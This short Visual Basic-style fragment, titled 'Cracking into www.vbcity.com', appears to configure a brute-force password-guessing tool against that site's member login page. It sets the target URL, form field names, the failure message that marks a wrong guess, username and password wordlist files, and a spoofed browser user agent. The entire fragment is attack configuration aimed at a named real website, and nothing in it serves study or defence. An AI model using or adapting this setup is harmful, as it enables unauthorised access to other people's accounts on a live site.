'
'  Cracking into www.vbcity.com
'
   txtURL = "http://www.vbcity.com/members/login.asp"
   cbxMethod = "POST"
   txtPort = "80"
   txtUserId = "UserName"
   txtPwdId = "Password"
   txtFailure = "Please Log In"
   txtUserFile = "users.txt"
   txtPassFile = "pass.txt"
   txtUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
